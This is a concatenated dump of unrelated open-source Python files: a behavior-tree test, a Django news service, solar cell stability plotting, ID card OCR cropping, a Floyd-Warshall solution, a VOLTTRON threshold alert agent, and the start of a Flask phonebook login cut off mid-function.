BehaviorTreeRunner()\n bt_runner.run(AsyncAddChildFallback, '')\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AsyncAddChildFallback'),\n call('on_init AsyncAddChildFallback'),\n call('AsyncAddChildFallback: DONE'),\n call('__init__ HelloWorldAction'),\n call('HelloWorldAction: Hello World !!!'),\n call('__del__ HelloWorldAction')]\n\n ########################################################################\n\n def test_RemoveAllChildrenFallback(self):\n \"\"\"Test the `RemoveAllChildrenFallback` node.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(RemoveAllChildrenFallback, '')\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ RemoveAllChildrenFallback'),\n call('on_init RemoveAllChildrenFallback')]\n","repo_name":"careBT/carebt_core","sub_path":"tests/test_fallbackNode.py","file_name":"test_fallbackNode.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"16018935173","text":"from django.http import Http404\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom django.db.models import F\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom django.conf import settings\n\nfrom ..models import Category\nfrom ..models import News\nfrom ..models import Comment\n\n\nclass NewsService():\n def __init__(self):\n pass\n\n def getAll(self):\n news = None\n try:\n news = News.objects.all()\n except Exception as e: raise Http404(\"DB Error: Cant get all news\")\n return news\n \n def getById(self, id):\n news = None\n try:\n news = News.objects.get(id=id)\n except Exception as e: raise Http404(\"DB Error: Cant get news by id\")\n return news\n \n 
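Editor's note: the expected call sequences in the tests above encode the fallback contract: children run in order, a child's FAILURE (possibly routed through a contingency handler first) hands control to the next child, and the first SUCCESS makes the whole fallback succeed; if every child fails, the fallback fails with the last contingency message. A minimal sketch of that control flow, independent of carebt's API (Status, run_fallback and the toy children below are illustrative, not the library's implementation):

from enum import Enum

class Status(Enum):
    SUCCESS = 1
    FAILURE = 2

def run_fallback(children):
    message = ''
    # Try each child in order; the first SUCCESS ends the sequence.
    for child in children:
        status, message = child()
        if status is Status.SUCCESS:
            return Status.SUCCESS, ''
    # Every child failed: fail with the last contingency message.
    return Status.FAILURE, message

# Toy children mirroring AddTwoNumbersActionWithFailure's two outcomes.
fails = lambda: (Status.FAILURE, 'NOT_TWO_NUMBERS_PROVIDED')
succeeds = lambda: (Status.SUCCESS, '')
print(run_fallback([fails, fails, succeeds]))  # SUCCESS, like AddTwoNumbersFallback3
print(run_fallback([fails, fails]))            # FAILURE, like AddTwoNumbersFallback4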
def getPublic(self):\n try:\n news = News.objects.filter(content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: Cant get public news\")\n return news\n\n def getAllByCategoryId(self, id):\n try:\n news = News.objects.filter(category_id=id)\n except Exception as e: raise Http404(\"DB Error: Cant get news by category id\")\n return news\n\n def getPublicByCategoryId(self, id):\n try:\n news = News.objects.filter(category_id=id, content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: cant get public news by category\")\n return news\n\n def searchByKeyword(self, keyword):\n try:\n news = News.objects.filter(Q(content__icontains=keyword) | Q(title__icontains=keyword))\n except Exception as e: raise Http404(\"DB Error: cant get searched news\")\n return news\n\n def updateViewCount(self, news_id):\n try:\n News.objects.filter(id=news_id).update(views=F('views')+1)\n except Exception as e: raise Http404(\"DB Error: cant update the view count\")\n \n def getRecentMostCommentedNews(self):\n try:\n check_date = timezone.now() + relativedelta(months=-settings.RECENT_NEWS_MONTH)\n news = Comment.objects.filter(news__publish_date__gt=check_date).values('news_id', 'news__title', 'news__views').annotate(total=Count('news_id'))\n return news\n except Exception as e: raise Http404(\"DB Error: cant get the most commented news\") \n\n\nclass CategoryService():\n def __init__(self):\n pass\n \n def getAll(self):\n try:\n categories = Category.objects.all()\n except Exception as e: raise Http404(\"DB Error: cant get all categories\")\n return categories \n\n def getPublic(self):\n try:\n categories = Category.objects.filter(content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: cant get public categories\")\n return categories\n\nclass CommentService():\n def __init__(self):\n pass\n \n def getByNewsId(self, news_id):\n try:\n comments = Comment.objects.filter(news_id=news_id)\n except Exception as e: raise Http404(\"DB Error: cant get comment by news id\")\n return comments \n\n def saveNewComment(self, form_data):\n try:\n news = NewsService().getById(form_data[\"news_id\"])\n comments = Comment(text=form_data[\"text\"], news = news, user = form_data[\"user\"]) \n comments.save()\n except Exception as e: raise Http404(\"DB Error: Could not save comment\")\n\n","repo_name":"nash90/news-app","sub_path":"app/news/service/news_service.py","file_name":"news_service.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"7935094999","text":"import datetime\nimport os\nimport pandas as pd\nimport json\nimport numpy as np\n#import plotly\n#import plotly.express as px\nimport plotly.graph_objects as go\nfrom IPython.display import display\n\ntest_name =['damp-heat','light-dark-cycle','mpp'] \ndamp_heat= 'damp-heat'\nlight_cycle= 'light-dark-cycle'\nmpp= 'mpp'\nbatch_name='old'\nignore_broken_cell = True\n\n\ndef read_modules(folder):\n '''\n read all xlsm name\n '''\n filename_list=[]\n for root, ds, fs in os.walk(folder):\n for f in fs:\n filename_list.append(f)\n return filename_list\n\n\ndef read_cell_pce(file_path,filename):\n '''\n read cell performance in one xlsm\n '''\n file_path = file_path+filename\n df = pd.read_excel(file_path, sheet_name = \"Sheet2\")\n df.dropna(axis=1,inplace=True)\n df.drop(index=0,inplace=True)\n df.drop(['Hystersis'],axis=1,inplace=True)\n \n df['name'] = pd.to_datetime(df['name'])\n start_time= df.at[1, 'name']\n start_state = df.iloc[0]\n 
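Editor's note: two ORM idioms in NewsService above are worth spelling out: update(views=F('views')+1) executes a single UPDATE in which the database itself computes views + 1, so concurrent requests cannot lose increments to a read-modify-write race, and values(...).annotate(total=Count('news_id')) compiles to a GROUP BY that yields one row per news item with its comment count. The two calls restated with comments, as a sketch (same News and Comment models; news_id and check_date as in the methods above):

from django.db.models import Count, F

# One statement: UPDATE ... SET views = views + 1 WHERE id = ...;
# no Python-side read of the old value is involved.
News.objects.filter(id=news_id).update(views=F('views') + 1)

# GROUP BY news_id: one row per news item, comment count in 'total'.
recent = (Comment.objects
          .filter(news__publish_date__gt=check_date)
          .values('news_id', 'news__title', 'news__views')
          .annotate(total=Count('news_id')))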
data_list = []\n ratio_list= []\n max_pce=[]\n max_pce_ratio=[]\n all_time=set()\n for index, row in df.iterrows():\n hour_data= []\n hour_data_ratio=[]\n hours = (row['name']-start_time).total_seconds()/3600\n hour_data.append(hours)\n all_time.add(hours)\n hour_data_ratio.append(hours)\n hour_data_ratio.append(row['name'])\n for i, v in row.iteritems():\n hour_data.append(v)\n if i == 'PCE_r':\n max_pce.append((hours,v))\n max_pce_ratio.append((hours,v/start_state[i]))\n if i!='name':\n hour_data_ratio.append(v/start_state[i]) \n data_list.append(hour_data)\n ratio_list.append(hour_data_ratio)\n \n filename = filename[:-5]\n if 'UV' in filename:\n filename = filename.replace('UV','')+\" with UV filter\"\n data ={'test_type':file_path.split('/')[2],'cell_name':filename,'cell_data':data_list,'data_ratio':ratio_list,'max_pce':max_pce,'max_pce_ratio':max_pce_ratio,'all_time':sorted(all_time)}\n return(data)\n\n\ndef read_all_test():\n '''\n generate all cell performance from all xlsm files\n '''\n all_test_data = []\n for i in test_name:\n file_path='./'+batch_name+'/'+i+'/'\n name_list = read_modules(file_path)\n for j in name_list:\n if (\"Broken\" in j) and (ignore_broken_cell is True):\n continue\n else:\n all_test_data.append(read_cell_pce(file_path,j))\n return(all_test_data)\n\n\ndef draw_cell_PCE_overview(data_list):\n '''\n draw all cell PCE data\n '''\n categories = []\n for i in data_list:\n categories.extend(i['all_time'])\n categories = sorted(set(categories))\n fig = go.Figure()\n \n for i in data_list:\n cell_array = [np.nan]*len(categories)\n for j in i['max_pce']:\n cell_array[categories.index(j[0])] = j[1]\n fig.add_trace(\n go.Scatter(\n x = categories,\n y = cell_array,\n name = i['test_type']+': '+i['cell_name'],\n line_shape = 'linear',\n mode = 'lines+markers',\n connectgaps=True\n )\n )\n fig.update_layout(title='PCE', \n #width = 800,\n height = 600,\n xaxis = dict(\n tickmode = 'array',\n tickvals = categories\n )) \n fig.show()\n \n\ndef draw_cell_PCE_overview_ratio(data_list):\n '''\n draw all cell PCE ratio\n '''\n categories = []\n for i in data_list:\n categories.extend(i['all_time'])\n categories = sorted(set(categories))\n fig = go.Figure()\n fig.add_hline(y=0.9)\n for i in data_list:\n cell_array = [np.nan]*len(categories)\n for j in i['max_pce_ratio']:\n cell_array[categories.index(j[0])] = j[1]\n fig.add_trace(\n go.Scatter(\n x = categories,\n y = cell_array,\n name = i['test_type']+': '+i['cell_name'],\n line_shape = 'linear',\n mode = 'lines+markers',\n connectgaps=True\n )\n )\n fig.update_layout(title='PCE Ratio',\n #width = 800,\n height = 600,\n xaxis = dict(\n tickmode = 'array',\n tickvals = categories\n )) \n fig.show()\n \n \ndef draw_cell_performance(data_list):\n '''\n draw 'Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f' from each cell\n '''\n categories = ['Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f']\n Columns = ['Hours', 'Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f']\n for i in data_list:\n fig = go.Figure()\n dataframe = []\n for j in range(len(i['data_ratio'])):\n data = i['data_ratio'][j][2:]\n #datalist = i['cell_data'][j][2:]\n datalist = i['cell_data'][j][2:]\n datalist.insert(0, i['cell_data'][j][0])\n #print(datalist)\n dataframe.append(datalist)\n fig.add_trace(go.Scatterpolar(\n r=data,\n theta=categories,\n name=str(i['data_ratio'][j][0])\n ))\n fig.update_layout(\n #width = 800,\n height = 600,\n polar=dict(\n radialaxis=dict(\n visible=True,\n title=dict(\n text = i['test_type'] + 
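Editor's note: read_cell_pce above applies two transformations per row: timestamps become hours elapsed since the first sample, and every metric is divided by its first measurement (v / start_state[i]) so each cell starts at a ratio of 1.0 and degradation is comparable across cells. The same two steps on a toy frame (column names and values are illustrative):

import pandas as pd

df = pd.DataFrame({
    'name': pd.to_datetime(['2021-01-01 00:00', '2021-01-01 12:00']),
    'PCE_r': [20.0, 18.0],
})
start_time = df.at[0, 'name']
start_state = df.iloc[0]

# Hours elapsed since the first sample.
df['hours'] = (df['name'] - start_time).dt.total_seconds() / 3600
# Value relative to the initial value: 1.0 at t=0, 0.9 after degradation.
df['PCE_r_ratio'] = df['PCE_r'] / start_state['PCE_r']
print(df)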
': '+i['cell_name'],\n                        font=dict(\n                            size = 30\n                        )\n                    )\n                    #i['test_type'] + ': '+i['cell_name'],\n                )\n            ),\n            showlegend=True\n        )\n        fig.show()\n        display(pd.DataFrame(dataframe,columns=Columns))\n\n\ndef read_performance(data_list):\n    cell_performance=dict()\n    cell_performance_ratio = dict()\n    cell_PCE_overview=dict()\n    cell_PCE_overview_ratio = dict()\n    for i in data_list:\n        cell_performance = dict()  # was [], which cannot take the dict-style keys assigned below\n        overview_performance = dict()\n        overview_performance_ratio = dict()\n        for j in i['cell_data']:\n            cell_performance_per_hours=dict()\n            cell_performance_per_hours['Voc_r'] = j[2]\n            cell_performance_per_hours['Jsc_r'] = j[3]\n            cell_performance_per_hours['FF_r'] = j[4]\n            cell_performance_per_hours['PCE_r'] = j[5]\n            cell_performance_per_hours['Voc_f'] = j[6]\n            cell_performance_per_hours['Jsc_f'] = j[7]\n            cell_performance_per_hours['FF_f'] = j[8]\n            cell_performance_per_hours['PCE_f'] = j[9]\n            cell_performance[j[0]] = cell_performance_per_hours\n        for j in i['data_ratio']:\n            cell_performance_per_hours=dict()\n            cell_performance_per_hours['Voc_r'] = j[2]\n            cell_performance_per_hours['Jsc_r'] = j[3]\n            cell_performance_per_hours['FF_r'] = j[4]\n            cell_performance_per_hours['PCE_r'] = j[5]\n            cell_performance_per_hours['Voc_f'] = j[6]\n            cell_performance_per_hours['Jsc_f'] = j[7]\n            cell_performance_per_hours['FF_f'] = j[8]\n            cell_performance_per_hours['PCE_f'] = j[9]\n            cell_performance_ratio[j[0]] = cell_performance_per_hours\n        for j in i['max_pce']:\n            overview_performance[j[0]] = j[1]\n        for j in i['max_pce_ratio']:\n            overview_performance_ratio[j[0]] = j[1]\n        cell_performance[i['cell_name']] = overview_performance\n        cell_performance_ratio[i['cell_name']] = overview_performance_ratio\n        cell_PCE_overview[i['cell_name']] = overview_performance\n        cell_PCE_overview_ratio[i['cell_name']] = overview_performance_ratio\n    return cell_performance, cell_performance_ratio, cell_PCE_overview, cell_PCE_overview_ratio\n","repo_name":"wangweialkane/module-stability","sub_path":"main_function.py","file_name":"main_function.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"42577700554","text":"import cv2\nimport numpy as np\nimport statistics\nimport copy\nimport pytesseract\nfrom PIL import Image\nfrom util.util import get_contour_boxes, get_img_from_box, get_threshold_img, find_max_box, show_img, draw_rec, plot_img\nfrom util.resize import resize_img_by_height, resize_img_by_width\n\n\ndef cropout_unimportant_part(img):\n    h, w, _ = img.shape\n    x = get_information_x_axis(img)\n    y = get_information_y_axis(img)\n    pic = img[int(1.2*y):int(0.9*h), 0:int(0.9 * x)]\n    img = img[y:h, x:w]\n\n    return img, pic\n\n\ndef crop_label(img):\n    h, w, _ = img.shape\n    img = img[0:int(0.9*h), 0:int(0.1 * w)]\n    return img\n\n\ndef get_info_list(img, contour_boxes):\n    contour_boxes.sort(key=lambda tup: tup[1])\n    height, width, _ = img.shape\n    list_info = []\n    for index, l in enumerate(contour_boxes):\n        x, y, w, h = l\n        y = y - 20\n        if index != len(contour_boxes) - 1:\n            x1, y1, _, _ = contour_boxes[index+1]\n            list_info.append((x, y, width, y1))\n        else:\n            list_info.append((x, y, width, height))\n    return list_info\n\n\ndef get_main_text(img, box, kernel_height):\n    x0, y0, x1, y1 = box\n    img = img[y0:y1, x0:x1]\n    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (25, 25))\n    thresh = get_threshold_img(img, kernel)\n    kernel = cv2.getStructuringElement(\n        cv2.MORPH_RECT, (thresh.shape[1], kernel_height))\n    dilation = cv2.dilate(thresh, kernel, iterations=1)\n    contour_boxes = get_contour_boxes(dilation)\n    max_box = max(contour_boxes, key=lambda 
tup: tup[2] * tup[3])\n x, y, w, h = max_box\n return (x0+x, y0+y, x0+x+w, y0+y+h)\n\n\ndef remove_name_label(group, width):\n avg = statistics.mean(map(lambda t: t[-1], group))\n group_orig = copy.deepcopy(group)\n for element in group_orig:\n if element[0] < width/10:\n group.remove(element)\n elif element[-1] < avg and element[0] < width/5:\n group.remove(element)\n return group\n\n\ndef remove_smaller_area(group, width):\n avg = statistics.mean(map(lambda t: t[-1] * t[-2], group))\n group_orig = copy.deepcopy(group)\n for element in group_orig:\n if element[0] < width/10:\n group.remove(element)\n elif element[-1] * element[-2] < avg and element[0] < width/5:\n group.remove(element)\n return group\n\n\ndef get_name(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n height, width, _ = img.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (25, 25))\n thresh_img = get_threshold_img(img, kernel)\n contour_boxes = get_contour_boxes(thresh_img)\n contour_boxes = remove_smaller_area(contour_boxes, width)\n contour_boxes = remove_name_label(contour_boxes, width)\n contour_boxes.sort(key=lambda t: t[0])\n x, y, w, h = find_max_box(contour_boxes)\n return (x0+x, y0+y, x0+x+w, y0+y+h)\n\n\ndef get_text_from_two_lines(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n height, width = thresh.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n avg = statistics.mean(map(lambda t: t[-1]*t[-2], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n box_height = box[1] + box[3]\n height_lim = 0.9 * height\n if box[1] > height_lim:\n contour_boxes.remove(box)\n elif box_height == height and box[1] > 0.8 * height:\n contour_boxes.remove(box)\n elif box[-1] * box[-2] < avg/3:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n if h < 55:\n return (x0+x, y0+y, x0+x+w+5, y0+y+h+5)\n else:\n crop_img = thresh[y:y+h, x:width]\n height, width = crop_img.shape\n hist = cv2.reduce(crop_img, 1, cv2.REDUCE_AVG).reshape(-1)\n hist = uppers = [hist[y] for y in range(height//3, 2*height//3)]\n line = uppers.index(min(uppers)) + height//3\n first_line = (x0+x, y0+y, x0+x+w, y0+y+line)\n second_line = (x0+x, y0+y+line, x0+x+w, y0+y+h)\n return [first_line, second_line]\n\n\ndef get_two_lines_img(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n height, width = thresh.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n avg = statistics.mean(map(lambda t: t[-1]*t[-2], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n box_height = box[1] + box[3]\n height_lim = 0.9 * height\n if box[1] > height_lim:\n contour_boxes.remove(box)\n elif box_height == height and box[1] > 0.8 * height:\n contour_boxes.remove(box)\n elif box[-1] * box[-2] < avg/3:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n return (x0+x, y0+y, x0+x+w+5, y0+y+h+5)\n\n\ndef process_result(orig, ratio, result):\n if type(result) is tuple:\n return [get_img_from_box(orig, ratio, result, padding=2)]\n if type(result) is list:\n first_line = get_img_from_box(orig, ratio, result[0], padding=2)\n first_line = 
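Editor's note: the split logic in get_text_from_two_lines above is a horizontal projection profile: cv2.reduce(crop_img, 1, cv2.REDUCE_AVG) collapses each row of the thresholded crop to its mean intensity, and the darkest row within the middle third is taken as the gap between the two text lines. The same idea with NumPy alone (the synthetic image is illustrative):

import numpy as np

# Synthetic binary crop: two bright text bands separated by a dark gap.
img = np.zeros((30, 100), dtype=np.uint8)
img[3:12] = 255   # first text line
img[18:27] = 255  # second text line

profile = img.mean(axis=1)            # one mean intensity per row
h = len(profile)
middle = profile[h // 3: 2 * h // 3]  # search only the middle third
split = int(np.argmin(middle)) + h // 3
print(split)  # a row index inside the gap between the bands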
cut_blank_part(first_line)\n second_line_img = get_img_from_box(orig, ratio, result[1], padding=2)\n second_line = cut_blank_part(second_line_img)\n return [first_line, second_line]\n\n\ndef get_last_y(result):\n if type(result) is tuple:\n return result[-1]\n if type(result) is list:\n return result[1][-1]\n\n\ndef cut_blank_part(img, padding=5):\n img_h, img_w, _ = img.shape\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n contour_boxes = get_contour_boxes(thresh)\n avg = statistics.mean(map(lambda t: t[-1], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n if box[-1] < avg/2:\n contour_boxes.remove(box)\n elif box[1] > img_h/2 and box[0] < img_w/10:\n contour_boxes.remove(box)\n elif box[1] < img_h/10 and box[-1] < img_h/5:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n new_width = x + w + padding\n if new_width > img_w:\n new_width = img_w\n return img[0:img_h, x: new_width]\n\n\ndef get_information_x_axis(img):\n img, ratio = resize_img_by_height(img)\n h, w, _ = img.shape\n img_resize = img[100:400, int(0.25*w):int(0.4*w)]\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (100, 100))\n thresh = get_threshold_img(img_resize, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, h))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n cnts = get_contour_boxes(dilation)\n cnts_copy = copy.deepcopy(cnts)\n for cnt in cnts_copy:\n if cnt[0] < 0.1*img_resize.shape[1]:\n cnts.remove(cnt)\n max_cnt = max(cnts, key=lambda x: x[-1] * x[-2])\n return int((max_cnt[0]-5+0.25*w)*ratio)\n\n\ndef get_information_y_axis(img):\n img, ratio = resize_img_by_width(img)\n h, w, _ = img.shape\n img_resize = img[0:int(0.4*h), 125:w]\n gray = cv2.cvtColor(img_resize, cv2.COLOR_BGR2GRAY)\n kernel = np.ones((25, 25), np.uint8)\n blackhat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, kernel)\n thresh = cv2.threshold(\n blackhat, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (20, 3))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n cnts = get_contour_boxes(dilation)\n cnts_copy = copy.deepcopy(cnts)\n for cnt in cnts_copy:\n if cnt[1]+cnt[-1] > 0.95 * img_resize.shape[0]:\n cnts.remove(cnt)\n elif cnt[-2] < 150:\n cnts.remove(cnt)\n max_cnt = max(cnts, key=lambda x: x[1])\n return int((max_cnt[1]-5)*ratio)\n\n\ndef detect_info(img):\n img, face = cropout_unimportant_part(img)\n orig = img.copy()\n img, ratio = resize_img_by_height(img)\n label_img = crop_label(img)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n threshold_img = get_threshold_img(label_img, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (label_img.shape[1]//2, 5))\n dilation = cv2.dilate(threshold_img, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n contour_boxes.sort(key=lambda t: t[2] * t[3], reverse=True)\n contour_boxes = contour_boxes[:5]\n info_list = get_info_list(img, contour_boxes)\n # get number part\n x, y, _, _ = info_list[0]\n number_box = (0, 0, img.shape[1], info_list[0][1])\n number_box = get_main_text(img, number_box, 5)\n number_img = get_img_from_box(orig, ratio, number_box)\n # get name part\n name_box = info_list[0]\n name_box = get_name(img, get_main_text(img, name_box, 5))\n name_img = get_img_from_box(orig, ratio, name_box, padding=2)\n name_img = cut_blank_part(name_img)\n # get dob part\n dob_box = info_list[1]\n dob_box = get_main_text(img, dob_box, 5)\n dob_img = get_img_from_box(orig, ratio, 
dob_box)\n    # get gender_and national part\n    gender_and_nationality_box = info_list[2]\n    gender_and_nationality_box = get_main_text(\n        img, gender_and_nationality_box, 5)\n    gender_n_nation_img = get_img_from_box(\n        orig, ratio, gender_and_nationality_box, padding=2)\n    h, w, _ = gender_n_nation_img.shape\n    gender_img = gender_n_nation_img[0:h, 0:int(w/3)]\n    nation_img = gender_n_nation_img[0:h, int(w/3):int(w)]\n    nation_img = cut_blank_part(nation_img)\n    # get country part\n    country_box = info_list[3]\n    x, y, x1, y1 = country_box\n    last_y = gender_and_nationality_box[-1]\n    country_img = process_result(\n        orig, ratio, get_two_lines_img(img, (x, last_y, x1, y1)))[0]\n    country_result = get_text_from_two_lines(img, (x, last_y, x1, y1))\n    country_img_list = process_result(orig, ratio, country_result)\n    address_box = info_list[4]\n    x, y, x1, y1 = address_box\n    last_y = get_last_y(country_result)\n    address_img = process_result(\n        orig, ratio, get_two_lines_img(img, (x, last_y, x1, y1)))[0]\n    result = get_text_from_two_lines(img, (x, last_y, x1, y1))\n    address_img_list = process_result(orig, ratio, result)\n    return face, number_img, name_img, dob_img, gender_img, nation_img, country_img, \\\n        address_img, country_img_list, address_img_list\n","repo_name":"thelong0705/vietnamese-id-card-ocr","sub_path":"detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":10543,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"51"}
+{"seq_id":"73883381919","text":"# The basic idea of Floyd-Warshall is to fill a 2D array that stores the weight of a path from i to j,\n# updating an entry whenever going from i to j through an intermediate vertex k is more efficient (cheaper) than going directly.\n# Because k is iterated in the outermost for loop, paths passing through several intermediate vertices are covered, not just a single stopover k.\n# k : intermediate vertex\n# for k in range(1, v+1):\n#     # i : source\n#     for i in range(1, v+1):\n#         # j : destination\n#         for j in range(1, v+1):\n#             dp[i][j] = min(dp[i][j], dp[i][k] + dp[k][j])\n# <source : https://seoyoung2.github.io/algorithm/2020/07/22/Floyd-Warshall.html>\n\n\n\nINF = 987654321\nn = int(input())\nm = int(input())\n\ndist = [[INF]*(n+1) for _ in range(n+1)]\n\nfor i in range(m):\n    a,b,c = map(int,input().split())\n    # dist[a][b] = c\n    dist[a][b] = min(dist[a][b],c)\n\nfor k in range(1,n+1):\n    dist[k][k] = 0\n    for i in range(1,n+1):\n        for j in range(1,n+1):\n            if dist[i][j] > dist[i][k] + dist[k][j]:\n                dist[i][j] = dist[i][k] + dist[k][j]\n\nfor i in range(1,n+1):\n    for j in range(1,n+1):\n        if dist[i][j] == INF:\n            dist[i][j] = 0\n        print(dist[i][j], end=\" \")\n    print()","repo_name":"yoonjung1205/ALGORITHM","sub_path":"BOJ/여러주제들/11404_플로이드.py","file_name":"11404_플로이드.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"74532529759","text":"import logging\nimport sys\nimport uuid\n\nfrom volttron.platform.vip.agent import Agent, Core, PubSub, RPC, compat\nfrom volttron.platform.agent import utils\nfrom volttron.platform.messaging.health import Status, STATUS_BAD\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n__version__ = '3.5'\n\n\ndef thresholddetection_agent(config_path, **kwargs):\n    \"\"\"Load configuration for ThresholdDetectionAgent\n\n    :param config_path: Path to a configuration file.\n\n    :type config_path: str\n    :returns: ThresholdDetectionAgent instance\n    :rtype: ThresholdDetectionAgent\n    \"\"\"\n    config = utils.load_config(config_path)\n    vip_identity = 'platform.thresholddetection'\n    kwargs.pop('identity', None)\n    return ThresholdDetectionAgent(config, 
identity=vip_identity)\n\n\nclass ThresholdDetectionAgent(Agent):\n    \"\"\"\n    Listen to topics and publish alerts when thresholds are passed.\n\n    The agent's configuration specifies which topics to watch, the\n    topic's threshold, and the message to send in an alert. Topics\n    in the `watch_max` list trigger alerts when the published data\n    are greater than the specified threshold. Topics in the\n    `watch_min` list trigger alerts when the published data are\n    less than the specified threshold. Non-numeric data will be\n    ignored. Alerts are published to alert/TOPIC where TOPIC is the\n    watched topic.\n\n    Example configuration:\n\n    .. code-block:: python\n\n        {\n            \"watch_max\": [\n                {\n                    \"topic\": \"datalogger/log/platform/cpu_percent\",\n                    \"threshold\": 99,\n                    \"message\": \"CPU ({topic}) exceeded {threshold} percent\",\n                    \"enabled\": true\n                }\n            ],\n            \"watch_min\": [\n                {\n                    \"topic\": \"some/temperature/topic\",\n                    \"threshold\": 0,\n                    \"message\": \"Temperature is below {threshold}\",\n                    \"enabled\": true\n                }\n            ]\n        }\n\n    \"\"\"\n    def __init__(self, config, **kwargs):\n        self.config = config\n        super(ThresholdDetectionAgent, self).__init__(**kwargs)\n\n    @Core.receiver('onstart')\n    def start(self, sender, **kwargs):\n\n        def is_number(x):\n            try:\n                float(x)\n                return True\n            except ValueError:\n                return False\n\n        def generate_callback(message, threshold, comparator):\n            \"\"\"generate callback function for pubsub.subscribe\"\"\"\n            def callback(peer, sender, bus, topic, headers, data):\n                if is_number(data):\n                    if comparator(data, threshold):\n                        alert_message = '{} ({} published {})\\n'.format(\n                            message, topic, data)\n                        self.alert(alert_message, topic)\n            return callback\n\n        comparators = {'watch_max': lambda x, y: x > y,\n                       'watch_min': lambda x, y: x < y}\n\n        for key, comparator in comparators.items():\n            for item in self.config.get(key, []):\n                if item.get('enabled', True):\n                    # replaces keywords ({topic}, {threshold})\n                    # with values in the message:\n                    msg = item['message'].format(**item)\n                    callback = generate_callback(\n                        msg, item['threshold'], comparator)\n                    self.vip.pubsub.subscribe(\n                        'pubsub', item['topic'], callback)\n\n    def alert(self, message, topic):\n        \"\"\"\n        Raise alert for the given topic\n\n        :param message: Message to include in alert\n        :param topic: PUB/SUB topic that caused alert\n        :type message: str\n        :type topic: str\n        \"\"\"\n        status = Status.build(STATUS_BAD, message)\n        self.vip.health.send_alert(topic, status)\n\n\ndef main(argv=sys.argv):\n    '''Main method called by the platform.'''\n    utils.vip_main(thresholddetection_agent)\n\nif __name__ == '__main__':\n    # Entry point for script\n    try:\n        sys.exit(main())\n    except KeyboardInterrupt:\n        pass\n","repo_name":"bemoss/BEMOSS3.5","sub_path":"services/core/ThresholdDetectionAgent/thresholddetection/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"51"}
+{"seq_id":"36176269818","text":"from flask import Flask, render_template, redirect, url_for, request, session\nimport pg\n\ndb = pg.DB(host=\"localhost\", user=\"postgres\", passwd=\"rocket\", dbname=\"phonebook\")\n\napp = Flask('phone book')\n\n\n@app.route('/')\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n    return render_template(\"login.html\")\n\n\n@app.route('/submit_login', methods=['POST', 'GET'])\ndef submit_login():\n    username = request.form.get('username')\n    password = request.form.get('password')\n    query = 
